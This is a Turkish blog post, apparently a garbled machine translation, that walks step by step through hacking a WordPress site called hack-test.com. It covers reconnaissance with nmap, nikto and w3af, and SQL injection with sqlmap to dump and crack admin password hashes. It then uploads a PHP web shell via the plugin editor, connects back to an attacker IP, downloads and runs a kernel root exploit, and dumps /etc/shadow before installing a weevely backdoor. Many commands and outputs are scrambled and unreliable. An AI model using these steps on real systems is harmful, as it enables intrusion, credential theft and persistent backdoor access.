Başlık | Kolay Yoldan Wordpress Ve Blog Hack ! [2015] |
Yetki | rw-r--r-- |
Yazar | WyNe |
Zaman | 20:20:00 |
Kategori | |
Share |
Bu sorunun cevabını sadece bir site hack için bir çok yol vardır, çünkü tespit etmek zor olabilir. Bu makalede amacımız, bu teknikleri en hackerlar tarafından kullanılan ve site hedefleme hack göstereceğim!
Hadi bu siteniz olduğunu varsayalım: hack-test.com
Hadi ping bu site almak için sunucu IP:
Şimdi 173.236.138.113 - bu hedef sitemizde barındırılan sunucu IP adresidir.
Diğer siteler aynı sunucuda yer bulmak için, sameip.org kullanacağız:
Aynı IP
26 siteler IP Adresi 173.236.138.113 üzerinde barındırılan
26 siteler IP Adresi 173.236.138.113 üzerinde barındırılan
KİMLİĞİ
|
Etki alanı
|
Site Linki
|
1
|
hijackthisforum.com
| |
2
|
sportforum.net
| |
3
|
freeonlinesudoku.net
| |
4
|
cosplayhell.com
| |
5
|
videogamenews.org
| |
6
|
gametour.com
| |
7
|
qualitypetsitting.net
| |
8
|
brendanichols.com
| |
9
|
8ez.com
| |
10
|
hack-test.com
| |
11
|
kisax.com
| |
12
|
paisans.com
| |
13
|
mghz.com
| |
14
|
debateful.com
| |
15
|
jazzygoodtimes.com
| |
16
|
fruny.com
| |
17
|
vbum.com
| |
18
|
wuckie.com
| |
19
|
force5inc.com
| |
20
|
virushero.com
| |
21
|
twincitiesbusinesspeernetwork.com
| |
22
|
jennieko.com
| |
23
|
davereedy.com
| |
24
|
joygarrido.com
| |
25
|
prismapp.com
| |
26
|
utiligolf.com
|
Yirmi altı diğer web siteleri bu sunucuda [173.236.138.113] ev sahipliği yaptı. Birçok hacker sitesi hack için aynı sunucuda diğer tüm siteleri hedef alacaktır. Ama için amaççalışmada, siteniz tek hedef ve bir kenara koyun aynı sunucudaki diğer siteleri hackleme edeceğiz.
Daha fazla ihtiyacımız var bilgi site hakkında:
- DNS kayıtlarını (A)NS, TXT, MX ve SOA
- Web Sunucu Tipi (ApacheIIS, Tomcat)
- Kayıt (etki sahibi olan şirket)
- İsim, adres ve telefon
- Sitenizi kullanan scriptleri (asp, asp.net, jsp,) cfm php
- Sunucu işletim sistemi (Unıx,Linux,Windows,Solaris)
- Sunucu portu açık ınternet (80, 443, 21, vb.)
Hadi Başlat sitenizi bulmakta DNS kayıtları. Web sitesi“. kullanırız ” elde bu:
Site DNS kayıtları olduğunu keşfettik:
HACK-TEST.COM DNS KAYITLARI
Kayıt
|
Yazın
|
TTL
|
Öncelik
|
İçerik
|
hack-test.com
|
Bir
|
4 saat
|
173.236.138.113 ()
| |
hack-test.com
|
SOA
|
4 saat
|
ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
| |
hack-test.com
|
NS
|
4 saat
|
ns1.dreamhost.com
| |
hack-test.com
|
NS
|
4 saat
|
ns3.dreamhost.com
| |
hack-test.com
|
NS
|
4 saat
|
ns2.dreamhost.com
| |
www.hack-test.com
|
Bir
|
4 saat
|
173.236.138.113 ()
|
Hadi web server türünü belirlemek:
Gördüğünüz gibi, site web server. Apache. Versiyonu daha sonra belirleyeceğiz.
HACK-TEST.COM SİTE BİLGİ
IP: 173.236.138.113
Web Sitesi Durum: aktif
Sunucu Türü: Apache
Alexa Trend/Rank: 1 Ay: 3,213,968 3 Ay: 2,161,753
Ziyaret başına sayfa görüntüleme: 1 Ay: 2.0 3 Ay: 3.7
Şimdi Doman senin bulma zamanı. Kayıt ve adınızı, adresinizi, e-posta ve telefon:
Şimdi kayıt ve diğer hayati var bilgi senin hakkında. 5 R1 sarfınazar adlı Whatweb serin bir aracı kullanarak sitenizde komut (OS türü, web Sunucusu sürüm) türünü bulabiliriz:
Şimdi site ünlü bir php komut dosyası denir kullandığını bulduk WordPresssunucu işletim sistemi web sunucu sürümü olan Fedora Linux ve o, (apache 2.2.15), açık bulalım senin içinde port sunucu.
Bunu yapmak için, nmap kullanacağız:
1 - server üzerinde çalışan hizmetler Bul
01
02
03
04
05
06
07
08
09
10
11
12
13
14
| root@bt:/#- sV hack-test.com nmap Başlangıç Nmap 5.59BETA1 ( http://nmap.org ) 2011-12-28 06:39 EET en Nmap hack-test.com (192.168.1.2) tarama raporu Ana kadar (0.0013 s gecikme süresi). Gösterilen: 998 filtre bağlantı noktaları LİMAN DEVLETİ SERVİSİ SÜRÜMÜ 22/tcp ssh kapalı 80/tcp open http Apache ((Fedora)) Apache 2.2.15 MAC Adresi: 00:0 C:: 01:8A:4D 29 (VMware) Hizmet tespiti yapıldı. Herhangi bir yanlış sonuçlara rapor lütfen http://nmap.org/submit/ . Nmap done: 1 IP address (1 host) 11.56 saniyede taranan |
2 - server OS Bul
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
| root@bt:/#- O hack-test.com nmap Başlangıç Nmap 5.59BETA1 ( http://nmap.org ) 2011-12-28 06:40 EET en Nmap hack-test.com (192.168.1.2) tarama raporu Ana kadar (0.00079 s gecikme süresi). Gösterilen: 998 filtre bağlantı noktaları LİMAN DEVLETİ SERVİSİ 22/tcp ssh kapalı 80/tcp open http MAC Adresi: 00:0 C:: 01:8A:4D 29 (VMware) Cihaz türü: genel amaç Çalışan: Linux 2.6.X OS ayrıntıları: Linux 2.6.22 (Fedora Core 6) Ağ Mesafe: 1 hop OS tespiti yapıldı. Herhangi bir yanlış sonuçlara rapor lütfen http://nmap.org/submit/ . Nmap done: 1 IP address (1 host) 7.42 saniye taranan |
Bağlantı noktası 80'i açın ve işletim sistemi sadece Linux 2.6.22(Fedora Core 6)
Tüm önemli topladık şimdi bilgi hakkında site, güvenlik açıkları için böyle tarayalım
Sql enjeksiyon - - SLP - Kör sql enjeksiyon, RFI - - CSRF, ve benzeri XSS.
Nikto.pl bilgi toplamak için, belki de, bazı güvenlik açıkları kullanacağız:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com - Nikto v2.1.4 --------------------------------------------------------------------------- + Hedef IP: 192.168.1.2 + Hedef Hostname: hack-test.com + Hedef Port: 80 + Başlat Zaman: 2011-12-29 06:50:03 --------------------------------------------------------------------------- + Server: Apache/2.2.15 (Fedora) + ETag Başlığı sunucusu, inode bulundu: 12748, boyutu: 1475, mtime: 0x4996d177f5c3b + Apache/2.2.15 modası geçmiş görünüyor (en azından mevcut. Apache/2.2.17). Apache (son sürüm) 1.3.42 ve 2.0.64 de geçerli. + HTTP Yöntemleri izin: GET, POST, SEÇENEKLERİ, İZLEME KAFA + - 877 OSVDB: HTTP İZLEME yöntemi, aktif, ana XST karşı savunmasız olduğunu iddia ediyor + OSVDB-3268: // simgeler: Dizin dizin oluşturma bulundu. + OSVDB-3233: /icons/README: Apache varsayılan dosya buldum. + 6448 öğeleri kontrol: 1 hata(s) ve 6 kalem(ler) uzak ana bildirildi + Bitiş Saati: 2011-12-29 06:50:37 (34 saniye) --------------------------------------------------------------------------- + 1 Ana Makine(ler) test |
Ayrıca W3AF kullanacağız. Geriye 5 R1 bu aracı bulabilirsiniz
01
02
03
04
05
06
07
08
09
10
11
12
13
14
| root@bt:/pentest/web/w3af# ./w3af_gui Başlangıç w3af, üzerinde çalışan: Python sürümü: 2.6.5 (r265:79063, Nis 16 2010, 13:57:41) [GCC 4.4.3] GTK sürüm: 2.20.1 PyGTK sürümü: 2.17.0 w3af - Uygulama Saldırı ve Denetim Çerçevesi Web Versiyon: 1.2 Düzeltme: 4605 Yazar: Andres Riancho ve w3af takım. |
Biz irademizi Ekle site URL ve tam denetim seçeneğini seçin:
Tarama tamamlanır ve göreceksiniz bir süre sonra,
Sitenizi hassas enjeksiyon, xss ve diğer sql için!
Sql enjeksiyon açığı araştırmak isterim:
Bu savunmasız url ve kedi savunmasız parametre.
Bu güvenlik açığı istismar edelim:
Bu vuln exploitating iş sqlmap kullanımı ve tüm veri tabanı dökümü yüzden başarısız olduğunu bulacağız bilgi kesmek gerekiyor bu site J
-U url ile kullanarak sqlmap
Birkaç saniye görecek sonra
N yazın ve devam etmek için enter tuşuna basın
Siteniz hata tabanlı açıktır gördüğünüz gibi sql enjeksiyon ve mysql veritabanı sürüm 5
Senin sitedeki tüm veritabanlarını bulmak ekleyerek izin ver “-dbs ”
Şimdi 3 veritabanları bulduk
Timsah wordpress ekleyerek veritabanı tablolar “-D wordpress -tablolar ”
Tüm bulacağız wordpress tablolar
“Tüm kullanıcılar bulacağız” tablosu, (admin?) wp_users dökümü istiyoruz bilgi(kullanıcı ve parola hash) ve karma çatlak ve girmeyi deneyin wordpress kontrol paneli ( wp-admin)
” Masa “-T wp_users-sütun ”“wp_users sütunları olacağız
22 sütunlar bulacağız
Biz sadece () user_login ve user_pass ekleyerek sütun timsah sütunlar, döküm, gerek
-C user_login,user_pass-dökümü
Önemli bulacağız bilgi; şimdi bulduk ve geçiş sağlamalarının kullanıcıları
ama bu karma metin parolaları temizlemek için çözmek istiyoruz. Online sitesini kullanacağız “http://www.onlinehashcrack.com/free-hash-reverse.php”
Ve kırmak için bu karma 7CBB3252BA6B7E9C422FAC5334D22054
Ve düz metin parola. q1w2e3
Ve kullanıcı adı “GeorgeMiller”
“Eğer bir yönetici ”bu ayrıntıları ile giriş yapacağız
Ve biz!
Tamam, site sunucusuna bazı linux komutları çalıştırmak için php web shell yüklemeyi deneyin. J
Bir eklenti düzenleme yapacağız wordpress “Tekstil ” ya da herhangi bir eklenti sayfasında buldum eklenti.
Ve düzeltmek için seçin
Gerçek eklenti yerine web kabuğu Ekle php edeceğiz. Bunu yaptıktan sonra, “” ve yeni bir php shell gidin güncelleme dosyası vuracağız
Woo, php kabuk çalışır. Şimdi site dosyalarını işleyebilirsiniz, ama sadece sunucunuzun kök almak ve diğer tüm siteleri de kesmek istiyoruz.
"- Geri bağlayın "php tab shell web ve bizim ip"," port "5555"192.168.1.6 bağlantısı geri seçeceğiz
Ama connect koyulmadan önce, biz ilk olarak bunun sebebi kullandığımız port "" saldırganın bizim makinede 5555 dinlemesi olun
Şimdi Bağlan vurdu ve göreceksiniz:
Hadi biraz linux komutları deneyin
01
02
03
04
05
06
07
08
09
10
11
| kimliği =48 uıd(apache)=489 gıd(apache) gruplar=489(apache) özürlü /var/www/html/Hackademic_RTB1/wp-içerik/plugins -bir uname Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat May 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux |
İd komutu ne kullanıcı kimliği, grup bize göstermek için kullanılır.
özürlü komut bize sunucu üzerinde bulunduğumuz yolu göstermek için kullanılır
uname-a komutu bize çekirdek sürümü hakkında bazı bilgileri göstermek için kullanılır
Tamam, şimdi sunucu çekirdek sürümü 2.6.31.5-127 olduğunu biliyorduk.fc12.1686
Bu sürüm için sömürmek için exploit-db.com arama veya daha yeni bir sürüm izin
“Kernel 2.6.31 ”türü olacağız
Tarih
|
D
|
Bir
|
V
|
Açıklama
|
Plat.
|
Yazar
| |
2009-10-15
|
-
|
904
| |||||
2009-08-31
|
-
|
1370
| |||||
2009-08-25
|
-
|
1059
| |||||
2009-08-04
|
-
|
1064
|
Sunucunuzdaki hepsini denedim, hiçbiri işe yaramadı, ama sonra yeni bir istismar çalıştım sonra
Tarih
|
D
|
Bir
|
V
|
Açıklama
|
Plat.
|
Yazar
| |
2010-10-19
|
-
|
9977
|
Bu url açtım ve bu bağlantıyı kopyaladım
http://www.exploit-db.com/download/15285
Ve benim bunun sebebi kullandığımız bu komut yapılmış kabuk
01
02
03
04
05
06
07
08
09
10
11
12
13
| wget http://www.exploit-db.com/download/15285 -O ro-ro.c --2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285 Çözme www.exploit-db.com... 199.27.135.111, 199.27.134.111 Www.exploit-db.com/199.27.135.111/:80... bağlı bağlanıyor. İstek gönderdi HTTP, yanıt bekliyoruz... 301 Kalıcı olarak Taşındı Konumu: http://www.exploit-db.com/download/15285/ [aşağıdaki] --2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/ Www.exploit-db.com/199.27.135.111/:80... bağlı bağlanıyor. İstek gönderdi HTTP, yanıt bekliyoruz... 200 TAMAM Uzunluk: 7154 (7.0 K) [application/] txt Kaydetme: `ro-ro.c' 0 K...... 100% 29.7=0.2 K s |
Wget komutu exploit-db.com istismar getirmek için kullandık ve O ro-ro yeniden adlandırmak için kullanılır.c
Not: linux çekirdeği patlatır çoğunlukla içinde kurtardık c dilinde delopped ediliyor .c uzantısı, sadece görünümü ve kaynak bulacaksınız istismar
#include
|
#include
|
#include
|
#include
|
#include
|
#include
|
#include
|
#include
|
#include
|
#include
|
#include
|
RECVPORT 5555 define #
|
SENDPORT 6666 define #
|
int (int prep_sock port)
|
{
|
int s, ret;
|
yapı sockaddr_in adresi;
|
socket s = (PF_RDS, SOCK_SEQPACKET, 0);
|
(s < 0) {
|
(“[*] açılamadı yuva.\printf”) n;
|
exit(-1);
|
}
|
memset(&adresi, 0, boyutu(Adres));
|
Tüm yukarıdaki satırlar bu istismar C dili ile yazılmış olduğunu belirtmek
Bizim sunucu üzerinde istismar kurtardık sonra, yazarak elf biçimine derleme olacağız
gcc ro-ro.c-o ro-ro
Ve çalıştırmak bizim yazarak istismar
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
| ./ro-ro [ * ] > = 2.6.30 Linux çekirdeği RDS yuva istismar [*] Dan Rosenberg tarafından [*] Çözme çekirdek adresleri... [+] 0xe09f0b20 karar rds_proto_ops [+] 0xe09db06a karar rds_ioctl [+] 0xc044e5f1 karar commit_creds [+] 0xc044e452 için prepare_kernel_cred çözüldü [*] Üzerine işlev işaretçisi... [ * ] > = 2.6.30 Linux çekirdeği RDS yuva istismar [*] Dan Rosenberg tarafından [*] Çözme çekirdek adresleri... [+] 0xe09f0b20 karar rds_proto_ops [+] 0xe09db06a karar rds_ioctl [+] 0xc044e5f1 karar commit_creds [+] 0xc044e452 için prepare_kernel_cred çözüldü [*] Üzerine işlev işaretçisi... [*] Tetikleme yük... [*] Geri işlev işaretçisi... |
Ve bu tür sonra
Kimliği
Kök biz buluruz J
=0(root) gid=0(root)uıd
Şimdi /etc/shadow dosyası görebiliriz
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| cat /etc/shadow :$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO kök.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7::: :*:14495:0:99999:7::bin: :*:14495:0:99999:7::daemon: :*:14495:0:99999:7::adm: :*:14495:0:99999:7::lp: :*:14495:0:99999:7::sync: :*:14495:0:99999:7::kapatma: :*:14495:0:99999:7::dur: :*:14495:0:99999:7::posta: :*:14495:0:99999:7::yolunu hesaplamak: :*:14495:0:99999:7::operatör: :*:14495:0:99999:7::oyunlar: :*:14495:0:99999:7::gopher: ftp:*:14495:0:99999:7::: :*:14495:0:99999:7::kimse: :!!vcsa:14557:::::: avahi-autoipd:!!:14557:::::: :!!ntp:14557:::::: :!!dbus:14557:::::: :!!rtkit:14557:::::: :!!nscd:14557:::::: :!!tcpdump:14557:::::: :!!avahi:14557:::::: :!!haldaemon:14557:::::: :!!openvpn:14557:::::: :!!apache:14557:::::: :!!saslauth:14557:::::: :!!mailnull:14557:::::: :!!smmsp:14557:::::: :!!smolt:14557:::::: :!!SSH:14557:::::: :!!darbe:14557:::::: :!!sözkonusu:14557:::::: p0wnbox.:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6tp8g7iatveet37lugjyvhm1myhelcypkijd8yv5olmnuhwbql76/:14981:0:99999:7::takım: :!!mysql:14981:::::: |
Ve görünüm /etc/passwd dosyası
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| cat /etc/passwd root:x:0:0::/root root:/bin/bash bin:x:1:1::/bin:/sbin/nologin bin daemon:x:2:2::/sbin:/sbin/nologin daemon adm:x:3:4::/var:/sbin/adm/nologin adm lp:x:4:7:://spool var://nologin sbin/lpd lp sync:x:5:0:sync:/://sync bin sbin shutdown:x:6:0:shutdown:/://kapatma sbin sbin halt:x:7:0::/sbin halt:/sbin/halt mail:x:8:12:://spool var/mail:/sbin/nologin mail yolunu hesaplamak için:x:10:14:://spool var://nologin sbin/yolunu hesaplamak yolunu hesaplamak operatör:x:11:0:operator:/://nologin sbin kök oyun:x:12:100:://oyunlar usr:/sbin/nologin oyunlar gopher:x:13:30:://gopher var://nologin sbin gopher ://var ftp:x:14:50:FTP Kullanıcı ftp:/sbin/nologin kimse:x:99:99:Kimse:/:/sbin/nologin vcsa:x:69:499:sanal bellek:/dev:/sbin sahibi konsolu/nologin avahi-autoipd:: 499:498:avahi-autoipd x:/var avahi-autoipd:/sbin/lib//nologin ntp:x:38:38::/://nologin sbin/etc / ntp dbus:x:81:81:Sistem mesajı bus:/:/sbin/nologin rtkit:x:498:494::/proc:/sbin/nologin RealtimeKit nscd:x:28:493:NSCD Daemon:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin avahi:: 497:492:avahi-daemon x:/var avahi-daemon:/sbin/Çalıştır//nologin haldaemon:x:68:491:HAL daemon:/:/sbin/nologin openvpn:x:496:490::/://nologin sbin openvpn etc/OpenVPN apache:x:48:489:Apache://var www:/sbin/nologin saslauth:x:495:488:"Saslauthd kullanıcı":/:/sbin/saslauth boş/var/nologin mailnull:x:47:487:://spool/://nologin sbin mqueue var smmsp:x:51:486:://spool/://nologin sbin mqueue var smolt:x:494:485::/usr/share/:/sbin smolt Smolt/nologin SSH:x:74:484:Ayrıcalık ayrılmış:/:/sbin/SSH boş/var/nologin SSH nabız:x:493:483:Sayede Sistem:/var/darbe/://sbin çalıştırmak nologin Daemon hamilelik:x:42:481:://lib/://nologin sbin sözkonusu var p0wnbox.Takım:x:500:500:p0wnbox.:/Team home/p0wnbox.://Bin / bash takım mysql:x:27:480:MySQL Sunucu://var lib://bin/mysql bash |
Tüm kullanıcılar kırabiliriz ile şifreleri “karındeşen” aracı.john
Ama bunu yapmayacaktır;/her zaman ziyaret hack yapabiliriz yani bu sunucuya erişim sağlamak istiyoruz J
Parola korumalı olan küçük ve kodlanmış bir php backdoor için weevely kullanımı ve bu php sunucu için arka kapı yükler.
Yapalım
1 - weevely kullanımı seçenekleri :
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| root@bt:/pentest/backdoors/web/weevely# ./main.py - Weevely 0.3 - Oluşturmak ve gizli yönetmek PHP arka kapılar. Telif hakkı (c) 2011-2012 Weevely Geliştiriciler Web sitesi: http://code.google.com/p/weevely/ Kullanımı: main.py [seçenekler] Seçenekler: -h, --help bu iletiyi ve çıkış yardımı göster -g, --arka kapı oluşturmak şifreli kod Oluşturmak gerekir-o-p . -o, --output=ÇIKIŞ Oluşturulan backdoor için çıktı dosya adı . -c KOMUT, --command=KOMUT Tek bir komut ve bir çıkış gerektirir-u yürütme ve-p . -t, --terminal terminal gibi bir oturumu Başlatmak gerekir-u ve-p . -C KÜME, --=küme KÜME Küme modu ver maddeleri okumaya başla formu 'etiketi, url,şifre etiket nerede' dosyası isteğe bağlı. -p PAROLA --şifre=ŞİFRE Şifreli kapı şifre . -u URL, --url=Uzak backdoor URL . |
2 - weevely kullanarak şifre koko ile php bir arka kapı Oluşturmak:
1
2
3
4
5
6
7
8
| root@bt:/pentest/backdoors/web/weevely# ./main.py -g-o hax.php -p koko Weevely 0.3 - Oluşturmak ve gizli yönetmek PHP arka kapılar. Telif hakkı (c) 2011-2012 Weevely Geliştiriciler Web sitesi: http://code.google.com/p/weevely/ + Backdoor 'dosyası parola ile oluşturulan''. koko hax.php |
3 - php web shell kullanarak sunucuya php backdoor Yükle
Ve biz bunu yükle sonra bunu kullanarak bağlayacak
01
02
03
04
05
06
07
08
09
10
11
12
| root@bt:/pentest/backdoors/web/weevely# ./main.py -t-u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php -p koko Weevely 0.3 - Oluşturmak ve gizli yönetmek PHP arka kapılar. Telif hakkı (c) 2011-2012 Weevely Geliştiriciler Web sitesi: http://code.google.com/p/weevely/ + Yöntemini kullanarak 'sistem()'. + Alınıyor terminal temel ortam değişkenleri . [apache@HackademicRTB1 //Hackademic_RTB1//html eğer bir içeriği var/www/plugins] |
Test hax.php bizim backdoor
Sonuç:
Bu makalede hackerlar tarafından hedef ve web sitesi ve sunucu kesmek için kullanılan bazı teknikler öğrendik. Bu makalede sevdim ve keyif aldım umarım.
Bir sonraki makalede web sitenizin birçok hacker saldırıları, hatta gelişmiş olanlar karşı çok güvenli olur, böylece saldırıları ve daha bu siteden güvenli, biz nasıl öğreneceğiz!
0 yorum:
Yorum Gönder
Makalemizi Okuduysanız Yorum yapabilirsiniz. Küfürlü Yorumlar Silinir Ve Kullanıcı Engellenir. İlginiz İçin Teşekkür Ederiz
#RedHatzOpTurkey